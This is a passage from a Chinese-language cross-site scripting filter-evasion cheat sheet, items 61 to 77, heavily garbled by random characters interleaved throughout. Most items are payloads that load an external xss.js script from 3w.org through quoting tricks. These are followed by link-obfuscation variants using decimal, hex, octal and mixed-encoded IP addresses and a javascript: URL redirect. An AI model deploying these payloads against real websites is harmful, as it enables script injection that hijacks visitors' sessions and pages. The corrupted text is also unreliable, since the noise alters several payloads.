+ Z+ d" d2 Q6 A/ {/ [% o (61)绕符号过滤2 D- Z6 y+ g- N# t5 s
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>' E7 V3 P5 r5 Z
8 X' z5 c* a( \6 Q
(62) ) Q0 f: b3 Z7 ]7 r4 b2 H+ F, U0 a <SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>7 w: a) V4 `6 e6 h
% N' k5 k6 U) Z, \2 e& k (63)+ K4 O% j: C" J8 V# `
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT> _+ i$ X# K" z, s5 w
) t9 e/ H9 s3 j3 S, _6 o) r (64) + m# y, o7 n' _% l- u <SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>. \. N6 B& p% k, e$ j$ [
2 q: m" N6 H9 G8 |! C! `* I
(65) c, S( E! }) _$ H8 m8 g/ B <SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>9 E" _& C+ w+ D' v8 \1 g
7 p; k9 ]1 h: ~' s8 A# g! B/ S
(66) ' N& U0 C+ ^( q3 `) t) \1 V <SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT> " L V9 Z% N W) S# j5 [# h0 O3 m. Z
(67) 9 Y( f, p% g' W- |8 r <SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>* X# `. M7 I. o& l% O- N* Z( [
% F) M- \1 p8 P& z6 {. u5 ~
(68)URL绕行 + S U3 ?' Y3 m. {' [1 Z <A HREF=”http://127.0.0.1/”>XSS</A> 1 P% F w/ @/ ^$ e) Q: t ^9 L9 r# O; K$ V+ R' U1 b (69)URL编码; z. Y! h2 }6 s& n: L
<A HREF=”http://3w.org”>XSS</A>! U y2 q7 k/ O
3 x. k; ?( |7 r* p2 Z Y; [6 U" }; B (70)IP十进制+ t! i" f7 n7 Z/ c0 y# g
<A HREF=”http://3232235521″>XSS</A>+ E% S* ?3 w( g/ e
8 b6 h8 g- F G) s: l (71)IP十六进制 / z6 ]' u, u! b6 l N* w <A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A> - w$ K3 V+ j0 ^! y' r# j3 r+ } ( ~. K: r2 ]! L6 B (72)IP八进制 A0 `' p2 ^) w' ]5 k3 ?
<A HREF=”http://0300.0250.0000.0001″>XSS</A>: u# T8 o# C6 C& `6 b; s
8 ~9 G0 Z+ Z$ N. \3 K+ m (73)混合编码 \$ g- n g$ l! _% z. h! Y <A HREF=”h , H% I; A m% P9 V tt p://6 6.000146.0×7.147/”">XSS</A>: P7 w z5 w5 t- m( p- U: ?+ n
9 Z5 ]* [! g, S4 s (74)节省[http:]: l2 Y* x8 a+ J& a" V9 i
<A HREF=”//www.google.com/”>XSS</A> ! S5 Y& H" J7 r. t; {1 H c" M) G! E8 z: S4 R (75)节省[www] ( Z- B; {( T. l" ~0 y <A HREF=”http://google.com/”>XSS</A>3 v4 D: C6 Y6 G/ r2 D
8 y+ Z- L% c6 z; D# E
(76)绝对点绝对DNS 1 P" ?' @- B) Q$ u$ |' D <A HREF=”http://www.google.com./”>XSS</A>/ I6 `/ J0 T5 X6 s3 `
7 G; T& y2 H2 T (77)javascript链接 # w& a4 L. _7 v" Y <A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>